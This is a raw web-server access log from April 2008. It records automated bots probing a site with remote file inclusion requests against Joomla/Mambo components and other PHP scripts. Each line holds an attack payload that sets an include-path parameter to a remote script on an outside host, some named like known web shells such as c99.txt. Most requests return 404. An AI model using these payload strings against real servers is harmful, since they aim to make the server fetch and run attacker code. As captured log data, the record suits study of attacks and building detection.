89.218.85.18 - - [27/Apr/2008:17:50:55 -0600] "GET /logs/////////?mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 200 2002 "-" "libwww-perl/5.805"
89.218.85.18 - - [27/Apr/2008:17:50:55 -0600] "GET /////////?mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 200 705 "-" "libwww-perl/5.805"
64.179.90.54 - - [27/Apr/2008:17:52:50 -0600] "GET /logs/access_log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
64.179.90.54 - - [27/Apr/2008:17:52:50 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
64.179.90.54 - - [27/Apr/2008:17:52:51 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
87.243.128.10 - - [27/Apr/2008:17:53:07 -0600] "GET /logs/access_log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
87.243.128.10 - - [27/Apr/2008:17:53:08 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
87.243.128.10 - - [27/Apr/2008:17:53:08 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
59.106.129.89 - - [27/Apr/2008:17:54:55 -0600] "GET /logs/error_log.20080330/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/y.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
59.106.129.89 - - [27/Apr/2008:17:54:55 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/y.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
81.174.65.190 - - [27/Apr/2008:17:54:57 -0600] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
81.174.65.190 - - [27/Apr/2008:17:54:57 -0600] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
59.106.129.89 - - [27/Apr/2008:17:55:22 -0600] "GET /logs/access_log.20080330/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/y.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.243.128.10 - - [27/Apr/2008:17:55:23 -0600] "GET /logs/access_log.20080406//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
64.179.90.54 - - [27/Apr/2008:17:55:27 -0600] "GET /logs/access_log.20080406//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
190.54.49.157 - - [27/Apr/2008:17:56:27 -0600] "GET //cm/cm_navigation.inc.php?path_pre=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 231 "-" "Microsoft Pocket Internet Explorer/0.6"
190.54.49.157 - - [27/Apr/2008:17:56:27 -0600] "GET /logs//cm/cm_navigation.inc.php?path_pre=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
72.55.174.10 - - [27/Apr/2008:17:56:38 -0600] "GET /logs/error_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 303 "-" "libwww-perl/5.810"
72.55.174.10 - - [27/Apr/2008:17:56:38 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.810"
72.55.174.10 - - [27/Apr/2008:17:56:38 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.810"
72.55.174.10 - - [27/Apr/2008:17:56:39 -0600] "GET /logs/error_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 303 "-" "libwww-perl/5.810"
72.55.174.10 - - [27/Apr/2008:17:56:40 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.810"
72.55.174.10 - - [27/Apr/2008:17:56:40 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.810"
72.55.174.10 - - [27/Apr/2008:17:57:16 -0600] "GET /logs/access_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 304 "-" "libwww-perl/5.810"
72.55.174.10 - - [27/Apr/2008:17:57:19 -0600] "GET /logs/access_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 304 "-" "libwww-perl/5.810"
87.243.128.10 - - [27/Apr/2008:18:00:24 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
87.243.128.10 - - [27/Apr/2008:18:00:24 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
202.143.173.2 - - [27/Apr/2008:18:00:57 -0600] "GET /logs//ashnews.php?pathtoashnews=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809x0?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
202.143.173.2 - - [27/Apr/2008:18:01:13 -0600] "GET //ashnews.php?pathtoashnews=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809x0?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
200.125.192.60 - - [27/Apr/2008:18:01:19 -0600] "GET /logs/error_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
200.125.192.60 - - [27/Apr/2008:18:01:19 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
200.125.192.60 - - [27/Apr/2008:18:01:19 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
200.125.192.60 - - [27/Apr/2008:18:01:19 -0600] "GET /logs/error_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
200.125.192.60 - - [27/Apr/2008:18:01:20 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
200.125.192.60 - - [27/Apr/2008:18:01:20 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
200.125.192.60 - - [27/Apr/2008:18:01:22 -0600] "GET /logs/error_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
200.125.192.60 - - [27/Apr/2008:18:01:22 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
200.125.192.60 - - [27/Apr/2008:18:01:23 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
217.196.64.12 - - [27/Apr/2008:18:01:39 -0600] "GET /logs/access_log.20080330/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://guhit.com/img/id.txt? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
217.196.64.12 - - [27/Apr/2008:18:01:39 -0600] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://guhit.com/img/id.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
217.196.64.12 - - [27/Apr/2008:18:01:40 -0600] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://guhit.com/img/id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
217.196.64.12 - - [27/Apr/2008:18:01:40 -0600] "GET /logs/access_log.20080330/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://guhit.com/img/id.txt? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
217.196.64.12 - - [27/Apr/2008:18:01:40 -0600] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://guhit.com/img/id.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
217.196.64.12 - - [27/Apr/2008:18:01:40 -0600] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://guhit.com/img/id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
200.125.192.60 - - [27/Apr/2008:18:02:11 -0600] "GET /logs/access_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
200.125.192.60 - - [27/Apr/2008:18:02:20 -0600] "GET /logs/access_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
200.125.192.60 - - [27/Apr/2008:18:02:26 -0600] "GET /logs/access_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://digilander.libero.it/atreus888/r0x/c99.txt?? HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
69.72.211.242 - - [27/Apr/2008:18:04:14 -0600] "GET /logs/access_log.20080330/index.php?lang=en&page=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
69.72.211.242 - - [27/Apr/2008:18:04:14 -0600] "GET /index.php?lang=en&page=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
69.72.211.242 - - [27/Apr/2008:18:04:14 -0600] "GET /logs/index.php?lang=en&page=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
195.205.214.163 - - [27/Apr/2008:18:05:25 -0600] "GET /logs/access_log//modules/xfsection/modify.php?dir_module=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/mv.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.803"
195.205.214.163 - - [27/Apr/2008:18:05:26 -0600] "GET //modules/xfsection/modify.php?dir_module=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/mv.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
195.205.214.163 - - [27/Apr/2008:18:05:27 -0600] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/mv.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
69.72.211.242 - - [27/Apr/2008:18:07:22 -0600] "GET /logs/access_log.20080413/index1.php?p=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
69.72.211.242 - - [27/Apr/2008:18:07:22 -0600] "GET /index1.php?p=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 228 "-" "libwww-perl/5.811"
69.72.211.242 - - [27/Apr/2008:18:07:22 -0600] "GET /logs/index1.php?p=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
198.106.231.114 - - [27/Apr/2008:18:07:40 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.misapri.com//includes/data/temp?? HTTP/1.0" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
198.106.231.114 - - [27/Apr/2008:18:07:41 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.misapri.com//includes/data/temp?? HTTP/1.0" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.94.32.245 - - [27/Apr/2008:18:08:19 -0600] "GET /logs/error_log.20080406/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
69.94.32.245 - - [27/Apr/2008:18:08:19 -0600] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
69.94.32.245 - - [27/Apr/2008:18:08:19 -0600] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.65"
77.232.68.17 - - [27/Apr/2008:18:08:49 -0600] "GET /logs/error_log.20080406/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
77.232.68.17 - - [27/Apr/2008:18:08:49 -0600] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
77.232.68.17 - - [27/Apr/2008:18:08:49 -0600] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
67.15.153.63 - - [27/Apr/2008:18:08:58 -0600] "GET /logs/error_log.20080406/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
67.15.153.63 - - [27/Apr/2008:18:08:58 -0600] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
67.15.153.63 - - [27/Apr/2008:18:08:58 -0600] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.65"
69.94.32.245 - - [27/Apr/2008:18:09:49 -0600] "GET /logs/access_log.20080406/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
89.108.67.176 - - [27/Apr/2008:18:09:51 -0600] "GET /logs/error_log.20080406/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
89.108.67.176 - - [27/Apr/2008:18:09:51 -0600] "GET /logs/error_log.20080406/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
89.108.67.176 - - [27/Apr/2008:18:09:52 -0600] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
89.108.67.176 - - [27/Apr/2008:18:09:52 -0600] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
89.108.67.176 - - [27/Apr/2008:18:09:52 -0600] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
89.108.67.176 - - [27/Apr/2008:18:09:52 -0600] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
217.196.64.12 - - [27/Apr/2008:18:10:18 -0600] "GET /logs/access_log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://guhit.com/img/id.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
217.196.64.12 - - [27/Apr/2008:18:10:18 -0600] "GET /logs/access_log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://guhit.com/img/id.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
77.232.68.17 - - [27/Apr/2008:18:10:23 -0600] "GET /logs/access_log.20080406/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
67.15.153.63 - - [27/Apr/2008:18:10:33 -0600] "GET /logs/access_log.20080406/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
87.229.26.205 - - [27/Apr/2008:18:11:52 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.229.26.205 - - [27/Apr/2008:18:11:52 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
89.108.67.176 - - [27/Apr/2008:18:11:58 -0600] "GET /logs/access_log.20080406/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
89.108.67.176 - - [27/Apr/2008:18:11:58 -0600] "GET /logs/access_log.20080406/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.72.211.242 - - [27/Apr/2008:18:12:10 -0600] "GET /logs/access_log.20080406/index.php?go1=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
69.72.211.242 - - [27/Apr/2008:18:12:10 -0600] "GET /index.php?go1=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
69.72.211.242 - - [27/Apr/2008:18:12:10 -0600] "GET /logs/index.php?go1=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
213.215.228.13 - - [27/Apr/2008:18:12:19 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
213.215.228.13 - - [27/Apr/2008:18:12:19 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
69.72.211.242 - - [27/Apr/2008:18:12:22 -0600] "GET /logs/access_log/index.php?go1=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 231 "-" "libwww-perl/5.811"
70.86.49.98 - - [27/Apr/2008:18:12:27 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
70.86.49.98 - - [27/Apr/2008:18:12:27 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
196.22.134.230 - - [27/Apr/2008:18:13:40 -0600] "GET /logs/error_log.20080406/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.811"
196.22.134.230 - - [27/Apr/2008:18:13:40 -0600] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.811"
196.22.134.230 - - [27/Apr/2008:18:13:41 -0600] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
195.205.214.163 - - [27/Apr/2008:18:16:38 -0600] "GET /logs/error_log//modules/xfsection/modify.php?dir_module=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/mv.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
200.87.179.130 - - [27/Apr/2008:18:18:05 -0600] "GET /_includes/settings.inc.phphttp://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 273 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.87.179.130 - - [27/Apr/2008:18:18:05 -0600] "GET /logs/_includes/settings.inc.phphttp://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.216.238.230 - - [27/Apr/2008:18:18:49 -0600] "GET /logs/access_log/index.php?body=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
200.216.238.230 - - [27/Apr/2008:18:18:52 -0600] "GET /index.php?body=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
200.216.238.230 - - [27/Apr/2008:18:18:53 -0600] "GET /logs/access_log/index.php?body=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
200.216.238.230 - - [27/Apr/2008:18:18:54 -0600] "GET /logs/index.php?body=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
200.216.238.230 - - [27/Apr/2008:18:18:55 -0600] "GET /index.php?body=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
200.216.238.230 - - [27/Apr/2008:18:18:57 -0600] "GET /logs/index.php?body=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
62.141.56.36 - - [27/Apr/2008:18:19:00 -0600] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
62.141.56.36 - - [27/Apr/2008:18:19:05 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
89.108.67.176 - - [27/Apr/2008:18:19:09 -0600] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
89.108.67.176 - - [27/Apr/2008:18:19:10 -0600] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tocs.xpg.com.br/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
66.7.193.54 - - [27/Apr/2008:18:19:13 -0600] "GET /logs/access_log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 282 "-" "libwww-perl/5.810"
66.7.193.54 - - [27/Apr/2008:18:19:13 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.810"
66.7.193.54 - - [27/Apr/2008:18:19:13 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.810"
66.7.193.54 - - [27/Apr/2008:18:19:14 -0600] "GET /logs/access_log.20080330/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 291 "-" "libwww-perl/5.810"
200.254.243.74 - - [27/Apr/2008:18:20:10 -0600] "GET /logs/index.php?go1=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
200.254.243.74 - - [27/Apr/2008:18:20:10 -0600] "GET /index.php?go1=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 227 "-" "libwww-perl/5.65"
210.109.102.108 - - [27/Apr/2008:18:20:20 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
83.223.101.14 - - [27/Apr/2008:18:20:34 -0600] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.223.101.14 - - [27/Apr/2008:18:20:34 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
